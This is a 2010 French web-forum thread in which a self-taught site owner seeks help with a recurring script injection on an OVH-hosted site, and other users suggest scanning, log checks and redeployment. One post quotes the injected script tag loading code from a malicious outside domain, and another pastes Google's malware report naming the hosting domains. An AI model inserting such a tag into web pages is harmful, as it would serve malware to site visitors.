Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
1508 connectés 

  FORUM HardWare.fr
  Programmation
  HTML/CSS

  virus récurant sur un site

 


 Mot :   Pseudo :  
 
Bas de page
Auteur Sujet :

virus récurant sur un site

n°2012485
hnb
Posté le 28-07-2010 à 14:42:35  profilanswer
 

Bonjour je suis dépitée je ne sais plus quoi faire.
 
Je vous explique ,  j'ai fait mon propre site, et le site de deux trois amies  Tous les sites sont hébergés chez OVH .
 
LE soucis est que je met en ligne mon site ( avant par Core FTP maintenant par Filezilla).  
Je change très souvent les mots de passes FTP,  et sur le site de mon amie il s y met fréquement le virus dans son code.
 
J'ai aucun virus sur le pc ( il vient aussi d'être reformaté ).
Mais chaque fois Google finit par le rejeter à cause d'intertion dans le code .  
Pourriez vous me dire comment empêcher l'insertion de cochonnerie sur les codes?
 
j'ai essayer en bloquant les permissions d'écriture via les commande Chmod ( excusez l'orthographe) mais rien ne vas ma copine devient folle et moi je deviens chauve mdr
 
La j'attends la revisite de google pour la 100 em fois mais je sais que cela reviendra ENCORE .
 
Merci de m'aider si vous en avez le temps .

mood
Publicité
Posté le 28-07-2010 à 14:42:35  profilanswer
 

n°2012505
krifur
Posté le 28-07-2010 à 15:31:12  profilanswer
 

et si tu copies le contenue de ton site en local puis tu fait une recherche antivirus par dessus, t'auras sans doute le fichier incriminé après il faudra analyser le dis fichier pour voir d'ou provient le bug.
Sinon y a pas plus d'informations sur le fait que google rejette ton site ?
ptet que c'est une erreur de code (genre boucle infinie ou intrusion de script javascript ) et donc pas vraiment un virus...

n°2012507
hnb
Posté le 28-07-2010 à 15:35:09  profilanswer
 

merci de votre réponse : en fait c'est une ligne de script qui se met sans que je le mette mois dessus . sans que je ne touche a rien .  
 
donc chaque fois je la supprime remet ma page clean et cela revient soit sur celle la soit sur une autre  
 
donc en fait je suis impuissante . je lis un peu partout qu'on parle de htt access ou un truc du genre mais je ne connais pas n y aurait il pas un moyen d'empêcher l'injection de script sur mes codes?

n°2012515
krifur
Posté le 28-07-2010 à 15:44:14  profilanswer
 

fait voir la ligne qui revient tout le temps
y aurait il une ligne quelconque de caracteres bizarre dans ton css ?


Message édité par krifur le 28-07-2010 à 15:45:56
n°2012590
hnb
Posté le 28-07-2010 à 17:02:23  profilanswer
 

re  
 
voici ce que je viens de reprendre:
<script src=http://mamata.com/Connections/mid_jobs_detail.ph
p >
 
mais ce n'est pas tjrs cette ligne des fois le texte change mais c est tjrs ce style .  
 

n°2012592
hnb
Posté le 28-07-2010 à 17:04:07  profilanswer
 

Ce site est considéré comme suspect et vous risquez d'endommager votre ordinateur si vous le visitez.
 
Une partie de ce site a été répertoriée 7 fois comme générant une activité suspecte au cours des 90 derniers jours.
 
Que s'est-il passé lorsque Google a visité ce site ?
Sur les 32 pages testées sur ce site au cours des 90 derniers jours, 24 page(s) a (ont) généré le téléchargement et l'installation de programmes malveillants sans l'autorisation de l'internaute. Google a visité ce site pour la dernière fois le 2010-07-27 et un contenu suspect a été détecté sur ce site pour la dernière fois le 2010-07-27.
Malicious software includes 16 exploit(s), 2 scripting exploit(s). Successful infection resulted in an average of 1 new process(es) on the target machine.
 
Le programme malveillant est hébergé sur 7 domaine(s), dont kockoy.com/, zakopane-rodzinnie.pl/, mamata.com/.
 
1 domaine(s) semble(nt) avoir servi d'intermédiaire pour la diffusion de logiciels malveillants auprès des visiteurs de ce site, dont mamata.com/.
 
This site was hosted on 1 network(s) including AS16276 (OVH).
 
Ce site a-t-il servi d'intermédiaire pour la diffusion de programmes malveillants ?
Au cours des 90 derniers jours, delacharmeraie.com ne semble pas avoir servi d'intermédiaire pour l'infection de sites Web.
 
Ce site a-t-il déjà hébergé des programmes malveillants ?
Non, ce site n'a pas hébergé de programmes malveillants au cours des 90 derniers jours.
 
Comment cela s'est-il produit ?
Dans certains cas, des tiers peuvent ajouter un code malveillant à des sites Web légitimes, ce qui nous amène à afficher le message d'avertissement.
 

n°2012593
hnb
Posté le 28-07-2010 à 17:04:56  profilanswer
 

il faut vraiment que je  remédie à cela . cela me mine

n°2012639
abais
Posté le 28-07-2010 à 18:45:45  profilanswer
 

Ça m'est arrivé plusieurs fois sur les serveur de mes clients, et c'est très fréquent, mais seulement sur les hébergement mutualisé d'OVH (sur mes hebergement 1&1, jamais de problèmes...)

 

Bref toujours est-il qu'en supprimant tout le contenu du FTP, changeant tous mes mots de passe (plateforme OVH + FTP), puis en reexportant le site (en ayant retiré tous les script des .html / .js et je ne sais quoi), je n'ai plus eu de problème...
Remarquez que je n'ai pas changé les logs de mes BDD...

 

Je n'ai jamais su d'où venait le problème, je ne pense pas à un virus, je suis très pointilleux là dessus (je suis sous linux)...
En plus, si c'était du coté software, ça aurait atteint mes autres FTP...
Je ne pense pas non plus que ce soit les boites mail de TOUS mes clients concerné qui auraient été lurké par un bot...

 

Je pense plutôt que la faille vient d'OVH perso...


Message édité par abais le 28-07-2010 à 18:47:27

---------------
Le membre ci-contre n'est pas responsable du message ci-dessus.
n°2012645
hnb
Posté le 28-07-2010 à 19:18:19  profilanswer
 

c'est ce que je me dis aussi ,  je me demande si je ne ferais pas mieux d'heberger mes sites ailleurs car là cela devient saoulant .

n°2012659
aideinfo
Posté le 28-07-2010 à 19:44:28  profilanswer
 

Perso, j'ai un hébergement OVH que je n'utilise pas, et pas de problème. Utilises-tu un site statique ou un script genre CMS ou blog ?


---------------
http://www.aideinfo.com/  Whois adresses IP/domaines le plus évolué !!  FAQ Free Mobile
mood
Publicité
Posté le 28-07-2010 à 19:44:28  profilanswer
 

n°2012668
hnb
Posté le 28-07-2010 à 20:03:37  profilanswer
 

c'est un site que j'ai fait avec frontpage ( je suis autodidacte) ,  
là je viens d'essayer de tout supprimer de l'hébergement il ne me le supprime pas .  
 
 

n°2012675
hnb
Posté le 28-07-2010 à 20:34:01  profilanswer
 

mon propre site meme hebergement j ai jamais eu de soucis  
www.catsnblue.com j pige pas

n°2012843
krifur
Posté le 29-07-2010 à 11:48:28  profilanswer
 

ptet que tu as une faille sur certains de tes sites qui permettent une attaque de ce genre...
utilises tu des scripts déjà fait genre phpbb ou autre...
t as regarder dans le syslog ou apache.log si tu retrouve des traces de ces adresses :kockoy.com/, zakopane-rodzinnie.pl/, mamata.com/.


Aller à :
Ajouter une réponse
  FORUM HardWare.fr
  Programmation
  HTML/CSS

  virus récurant sur un site

 

Sujets relatifs
Son dans flash à l'arrivé du siteLes JS externes me (sur) ralenti mon site. Améliorer ça ?
[Resolu]Site mal alignéJoomla/ pour chaque site à créer il faut réinstaller sur le serveur ?
Joomla ? Comment crée le deuxieme site ?Quel CMS pr site d'organisation de plannings
Premier site à faire ! Hébergement client ???Site hacké : comment avoir des infos ?
creer un site de jeu virtuelMCT d'un site web
Plus de sujets relatifs à : virus récurant sur un site


Copyright © 1997-2022 Hardware.fr SARL (Signaler un contenu illicite / Données personnelles) / Groupe LDLC / Shop HFR